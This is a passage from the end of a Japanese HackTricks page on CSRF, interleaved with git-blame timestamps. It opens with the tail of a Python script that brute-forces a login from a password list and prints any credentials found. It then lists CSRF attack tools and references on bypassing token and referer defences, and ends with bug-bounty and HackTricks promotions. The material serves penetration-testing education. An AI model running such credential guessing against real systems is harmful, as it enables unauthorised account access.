print(f"FOUND {user} : {password}")
return True
2020-11-06 18:22:38 +00:00
with open(PASS_LIST, "r") as f:
2023-07-07 23:42:27 +00:00
for line in f:
login(USER, line.strip())
2020-11-06 18:22:38 +00:00
```
2023-07-07 23:42:27 +00:00
## ツール <a href="#tools" id="tools"></a>
2020-07-15 15:43:14 +00:00
* [https://github.com/0xInfection/XSRFProbe ](https://github.com/0xInfection/XSRFProbe )
2022-09-26 09:52:47 +00:00
* [https://github.com/merttasci/csrf-poc-generator ](https://github.com/merttasci/csrf-poc-generator )
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
## 参考文献
2020-07-15 15:43:14 +00:00
* [https://portswigger.net/web-security/csrf ](https://portswigger.net/web-security/csrf )
2024-02-05 20:22:21 +00:00
* [https://portswigger.net/web-security/csrf/bypassing-token-validation ](https://portswigger.net/web-security/csrf/bypassing-token-validation )
* [https://portswigger.net/web-security/csrf/bypassing-referer-based-defenses ](https://portswigger.net/web-security/csrf/bypassing-referer-based-defenses )
2020-07-15 15:43:14 +00:00
* [https://www.hahwul.com/2019/10/bypass-referer-check-logic-for-csrf.html ](https://www.hahwul.com/2019/10/bypass-referer-check-logic-for-csrf.html )
2022-04-28 16:01:33 +00:00
2022-10-27 23:22:18 +00:00
2024-02-23 16:45:40 +00:00
< figure > < img src = "../.gitbook/assets/image (1) (3) (1).png" alt = "" > < figcaption > < / figcaption > < / figure >
2023-07-14 16:20:47 +00:00
2024-02-05 20:22:21 +00:00
[**HackenProof Discord** ](https://discord.com/invite/N3FrSbmwdy ) サーバーに参加して、経験豊富なハッカーやバグバウンティハンターとコミュニケーションを取りましょう!
2023-07-14 16:20:47 +00:00
2023-12-31 05:23:56 +00:00
**ハッキングの洞察**\
2024-02-05 20:22:21 +00:00
ハッキングのスリルとチャレンジに深く入り込むコンテンツに参加しましょう
2023-02-27 09:28:45 +00:00
2023-12-31 05:23:56 +00:00
**リアルタイムハックニュース**\
2024-02-09 08:23:12 +00:00
リアルタイムのニュースと情報を通じて、ハッキングの世界を追いかけましょう
2022-10-27 23:22:18 +00:00
2023-12-31 05:23:56 +00:00
**最新の発表**\
2024-02-09 08:23:12 +00:00
最新のバグバウンティの開始や重要なプラットフォームの更新情報を把握しましょう
2023-02-27 09:28:45 +00:00
2024-02-23 16:45:40 +00:00
**[Discord](https://discord.com/invite/N3FrSbmwdy)** に参加して、今日からトップハッカーと協力を始めましょう!
2022-10-27 23:22:18 +00:00
2022-04-28 16:01:33 +00:00
< details >
2024-02-23 16:45:40 +00:00
< summary > < strong > **htARTE (HackTricks AWS Red Team Expert)** でゼロからヒーローまでAWSハッキングを学びましょう! < / strong > < / summary >
2023-12-31 05:23:56 +00:00
2024-02-05 20:22:21 +00:00
HackTricks をサポートする他の方法:
2022-04-28 16:01:33 +00:00
2024-02-05 20:22:21 +00:00
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop ) をチェックしてください!
* [**公式PEASS& HackTricksスワッグ** ](https://peass.creator-spring.com )を手に入れる
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ) を発見し、独占的な [**NFTs** ](https://opensea.io/collection/the-peass-family ) のコレクションを見つける
2024-02-23 16:45:40 +00:00
* 💬 [**Discord グループ** ](https://discord.gg/hRep4RUj7f ) または [**telegram グループ** ](https://t.me/peass ) に参加するか、Twitter 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live ) をフォローする
* ハッキングトリックを共有するために、[**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) のGitHubリポジトリにPRを提出する
2022-04-28 16:01:33 +00:00
< / details >